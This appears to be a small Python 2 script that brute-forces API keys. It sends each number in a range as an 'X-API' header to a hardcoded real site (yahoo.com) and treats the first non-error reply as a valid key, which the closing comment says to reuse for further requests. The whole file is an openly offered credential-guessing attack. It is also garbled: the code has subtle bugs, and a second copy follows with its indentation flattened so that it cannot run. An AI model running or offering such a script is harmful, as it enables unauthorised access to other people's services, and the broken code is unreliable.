bmelton/brute_force_api_key.py

## brute_force_api_key.py
import urllib
import urllib2

def brute_force_api_key(url, begin_api_key, ending_api_key):
  actual_api_key = None

  for api_key in range(begin_api_key, ending_api_key):
    headers = { 'X-API': api_key }
    data = {}
    values = urllib.urlencode(data)
    request = urllib2.Request(url, values, headers)

    try:
        response = urllib2.urlopen(request)
        response_headers = response.info()
        response_headers.dict
        # If this succeeds, the response.code == 200, which is a success.
        # It might also be some number other than 200 (301, 302 might be valid,
        # indicating redirect, but anything over that is considered faulty)
        return api_key

    except urllib2.HTTPError, e:
        print ("Error key: %s" % e.key)

  return actual_api_key

url = 'https://yahoo.com/'
actual_api_key = brute_force_api_key(url, 5500, 6000)
print(actual_api_key)

# Now that you have determined the API key, you can make normal
# requests, providing `actual_api_key` where needed
	import urllib
	import urllib2

	def brute_force_api_key(url, begin_api_key, ending_api_key):
	actual_api_key = None

	for api_key in range(begin_api_key, ending_api_key):
	headers = { 'X-API': api_key }
	data = {}
	values = urllib.urlencode(data)
	request = urllib2.Request(url, values, headers)

	try:
	response = urllib2.urlopen(request)
	response_headers = response.info()
	response_headers.dict
	# If this succeeds, the response.code == 200, which is a success.
	# It might also be some number other than 200 (301, 302 might be valid,
	# indicating redirect, but anything over that is considered faulty)
	return api_key

	except urllib2.HTTPError, e:
	print ("Error key: %s" % e.key)

	return actual_api_key

	url = 'https://yahoo.com/'
	actual_api_key = brute_force_api_key(url, 5500, 6000)
	print(actual_api_key)

	# Now that you have determined the API key, you can make normal
	# requests, providing `actual_api_key` where needed